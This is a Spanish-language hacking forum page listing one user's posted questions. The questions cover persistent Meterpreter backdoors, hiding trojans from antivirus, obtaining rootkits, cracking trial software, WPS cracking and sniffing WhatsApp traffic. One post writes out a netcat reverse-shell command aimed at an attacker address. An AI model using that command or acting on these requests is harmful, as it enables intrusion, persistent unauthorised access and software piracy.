Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Rocky91

#1
Buenas.

Bueno tenía una pregunta a ver si alguien me puede echar una mano.

¿Se podría hacer una sesión meterpreter persistente como en windows?
Quiero decir, para que la sesión se abra en el meterpreter, hay que darle a la aplicación ya instalada en el teléfono, una vez que sales del meterpreter se cierra la sesión y no se vuelve abrir hasta que le vuelvas a dar a la aplicación.
Entonces... mi pregunta. ¿Se podría hacer para que la aplicación instalada en el telefono haga una conexión automática, por ejemplo cada 15 segundos o hay otra manera?

Gracias y saludos.
#2
Hola a todos.

Veréis, estoy creando un script, y en ese script necesito abrir otra consola, y en esa consola ejecutar ciertos comandos. No se si me entendéis, consigo al ejecutar el script abrir otra consola pero no consigo ejecutar ni escribir nada en esa terminal.

Saludos
#3
Buenas a todos.

Tengo un troyano en una maquina virtual controlado por meterpreter desde metasploit. Todo correcto.
Cuando sales de la sesión y quieres volver a entrar ya no puedes hasta que no vuelvas a ejecutar el .exe

¿Hay alguna manera de no volver a ejecutar el .exe? Solo ejecutarlo la primera vez.

Saludos
#4
Buenas a todos.

Tengo un programa para mi taller muy bueno de facturas y hojas de trabajo de clientes.

Y bueno es una versión evaluación y necesito el programa full. Usuario y contraseña Demo.

Me gustaría poder hacer un crack para hacerlo full.

A ver si me podéis echar una mano.

Saludos.
#5
Dudas y pedidos generales / Ayuda con vsftpd
Febrero 09, 2016, 11:30:16 AM
Buenas a todos.

He montado un servicio ftp con vsftpd en una raspberry. Esta todo montado y listo.

A la raspberry le tengo conectado un disco duro externo, y me gustaría saber como hacer que todos los archivos tanto que suba como que baje vallan al disco duro, ya que por defecto se descarga en la carpeta /home del usuario y la tarjeta de la Raspberry es de 8GB.

He mirado en el archivo de configuración pero no encuentro nada que me suene como hacerlo.

Saludos.
#6
Dudas y pedidos generales / WPS Duda
Enero 03, 2016, 06:51:12 AM
Buenos días a todos.

Tengo un duda con reaver y es la siguiente.

Al usar reaver y llegar a un 99.99%, vuelve al 50% hasta volver al 99,99%.
En principio lo dejaba ya que pienso que vuelve al 50% por que ha sacado los 4 primeros dígitos y le quedan los otros 4, pero cuando vuelve al 99,99% se queda ahí.
Ya ha pasado dos veces.

¿Que puede ser?

Saludos
#7
Buenas tardes.

Tengo pensado en comprarme una antena si no esta como esta ---> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
y esto conectar a un tipo de router, y que este expanda la señal recibida de la antena por la casa tanto por cable como por wifi.
Algo Así como esto.


Desconozco que tipo de router puede soportar la entrada del cable de antena, en ejemplo esta que he puesto anteriormente conector N Hembra, o que pueda hacer esto que pido.

Haber si me podéis orientar un poco.

Saludos
#8
El caso es este. Al hacer el ataque WPS tanto con reaver como con el script wifite, si estoy cerca del router, osea bastantes dBi, 56dBi al hacer el ataque en un tipo de router no avanza de pin 12345670 pero si pruebo con otro router que tenga menos dBi poniendo este caso con 35 dBi enseguida avanza de pin.

Siempre he leído que cuando no avanza es problema de la señal, en este caso los dBi, pero tengo comprobado que no es eso, ya que habéis leído arriba el problema.

También muchos dicen que puede que no tenga activado el WPS, en mi caso si los tiene tanto wifite como wash me afirman que si lo tienen activado.

¿Por que sucede esto?

Saludos.
#9
Buenas noches a todos.

Hace tiempo vi un tutorial por ahí de como sniffar el trafico de whatsapp.

Ahora han mejorado el algoritmo de cifrado o eso he leído por ahí.

Mi pregunta es.

Usando la herramienta arpspoofing solamente se podría leer el trafico? aunque claro esta cifrado, haría falta de tirar de otra herramienta tipo sslstip?

Saludos.
#10
Buenas noches

Una pregunta un poco tontilla. Me he leido el manual de mv pero o no encuentro nada o se me escapa. ???
¿Como puedo mover o copiar varios archivos del mismo formato de una sola tirada?

Por ejemplo, mover todos los .png de la carpeta 1 a la carpeta 2.

Saludos
#11
Buenas noches a todos.

Bueno tengo una pregunta a ver si alguien me la sabe resolver.

Bien tengo un Pendrive de 4 GB con datos, y lo clono con dd a otro Pendrive de 8GB. Hasta ahí todo bien.

Vale aquí viene lo importante.

Para confirmar que los datos se han pasado correctamente de uno a otro, es necesario sacar el hash md5 al Pendrive de 4GB y al de 8GB y ver que coinciden los hashes.

Bien ahora aquí mi duda.

Nunca he hecho esto de sacar los hashes o crearlos, ¿como sería esto, se crea un hash al Pendrive de 4GB y después se compara con el de 8GB, o ya tiene su hash el pendrive de 4GB o como se haría?
Después he visto que hay dos herramientas de hash md5, md5sum y md5deep. ¿Que diferencia a una de otra?

Un Saludo a todos.
#12
Hola a todos.

Estoy ahora conociendo Beef, por lo que veo funciona bien dentro de la red. ¿Podría usarse fuera de la red local? Si es así, ¿Cual sería su configuración, algún consejo?

Saludos
#13
Hola a todos.

Estoy ahora con el tema de los troyanos, en una practica que tengo hacer, que se trata de ocultar el troyano frente al antivirus, ¿como podría hacerlo bien? ¿Hay algún tutorial o algo? me refiero ha hacerlo de manera "Profesional", nada de por ejemplo themida.

Saludos
#14
Buenas a todos.

Me gustaría saber donde encontrar una RootKit para una practica que tengo que hacer, otra cosa que me gustaría sería el echo de crear una, así subir nota. ;D

Saludos
#15
Hola a todos.

Bueno mi problema es que al intentar acceder al navegador a traves de una cadena de proxys no puedo, os dejo lo que e dice.

Saludos

Configuración

Código: php
# proxychains.conf  VER 3.1
#
#        HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.
#       

# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
#dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random - Each connection will be done via random proxy
# (or proxy chain, see  chain_len) from the list.
# this option is good to test your IDS :)

# Make sense only if random_chain
#chain_len = 2

# Quiet mode (no output from library)
#quiet_mode

# Proxy DNS requests - no leak for DNS data
proxy_dns
# Some timeouts in milliseconds
tcp_read_time_out 15000
tcp_connect_time_out 8000

# ProxyList format
#       type  host  port [user pass]
#       (values separated by 'tab' or 'blank')
#
#
#        Examples:
#
#               socks5  192.168.67.78   1080    lamer   secret
#               http    192.168.89.3    8080    justu   hidden
#               socks4  192.168.1.49    1080
#               http    192.168.39.93   8080   
#               
#
#       proxy types: http, socks4, socks5
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050
socks4  88.150.205.239  1080


Error que me dá

Código: php
root@bt:~# proxychains google-chrome
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-request| ::1
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: ::1 is not exist
|DNS-request| www.google.es
|DNS-request| www.google.com
|S-chain|-<>-127.0.0.1:9050-<--timeout
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-response|: www.google.com is not exist
[10484:10514:0616/171138:ERROR:object_proxy.cc(624)] Failed to get name owner. Got org.freedesktop.DBus.Error.NameHasNoOwner: Could not get owner of name 'org.chromium.Mtpd': no such name
[10484:10514:0616/171138:ERROR:object_proxy.cc(624)] Failed to get name owner. Got org.freedesktop.DBus.Error.NameHasNoOwner: Could not get owner of name 'org.chromium.Mtpd': no such name
|DNS-request| clients4.google.com
|DNS-request| translate.googleapis.com
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: clients4.google.com is not exist
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: translate.googleapis.com is not exist
[10484:10484:0616/171138:ERROR:object_proxy.cc(529)] Failed to call method: org.chromium.Mtpd.EnumerateStorages: object_path= /org/chromium/Mtpd: org.freedesktop.DBus.Error.ServiceUnknown: The name org.chromium.Mtpd was not provided by any .service files
|DNS-request| www.google.es
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.com
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.com is not exist
|DNS-request| www.google.es
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| tnqhmsvxza
|DNS-request| kupsdqwpfn
|DNS-request| omepajdrvj
|S-chain|-<>-127.0.0.1:9050-|S-chain|-<>-127.0.0.1:9050-<--timeout
<--timeout
|DNS-response|: tnqhmsvxza is not exist
|DNS-response|: kupsdqwpfn is not exist
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: omepajdrvj is not exist
|DNS-request| ssl.gstatic.com
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: ssl.gstatic.com is not exist
|DNS-request| www.google.es
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist

#16
Hola a todos.

Necesitaría uno de estos dos programas si es los dos mejor, para ejecutarlo en Windows desde backtrack.

¿Sabéis algún sitio donde descargarlo?

Saludos
#17
Dudas y pedidos generales / Ayuda con themida
Junio 16, 2013, 07:20:29 AM
Hola a todos.

Necesito un manual de themida no un tutorial, he estado buscando por google y nada mas que encuentro tutoriales de tipo pon esto igual que la imagen y listo, no busco eso busco un manual que te explique para que vale cada función. ¿Sabéis alguno?

Saludos
#18
Hola a todos.



Una vez que ya tengo dominado los escaneadores de vulnerabilidades, metasploit y haber ejecutado la puerta trasera con NetCat hata ahí bien.

Pero mi duda es, para ejecutar netcat desde la maquina victima, tienes que estar conectado por meterpreter, dese ahí ejecutar la shell, irte al directorio donde esta netcat y ejecutar nc dirección_atacante 37337 -e cmd.exe y en la maquina atacante nc -v -l -p 37337 y ya se establece la conexión, ¿y si al quieres conectarte otro dia directamente por nc, tienes otra vez que conectarte a metasploit ejecutar la shell y nc? no tiene sentido, por que en el momento que pongan el parche ya no puedes volver a lanar el exploit, tiene que aver algún modo que la maquina victima siempre quiera conectarse a nosotros. ¿Como?

Saludos
#19
Hola a todos

Viendo Metasploit vi los módulos auxiliares que no se lo que son, y mi pregunta es:
¿Que son, para que sirve y cual es su funcionamiento?  ???

Saludos
#20
Hola a todos.

Tengo una pequeña duda, y es una vez dentro de la maquina a traves de un exploit, ¿a una maquina cliente de Windows, como le subo la backdoors?

A un servidor si es linux o Windows se que lo puedo subir por wget (Linux) ftp o tftp (Windows o linux).

¿Pero cliente Windows?
#21
Hola a todos.

Quisiera saber como poder generar un diccionario para WPA.

¿Sabéis de algún tuto?

Saludos
#22
Hola a todos.

Bueno necesito un troyano que trabaje bajo linux, y no bajo windows como bifrost, Spy-net etc, no me digáis que use Wine, no me gusta xD.

¿ Conocéis alguno?

Saludos
#23
Hola a todos.

Estoy usando la distro Kali Linux basada en Debian.

El caso es que xplico no viene incluida en dicha distro, y al querer instalarlo parece ser que nada mas está para sistemas basados en Ubuntu. :'(

¿Alguna solución para poder instalarlo en Debian?

Saludos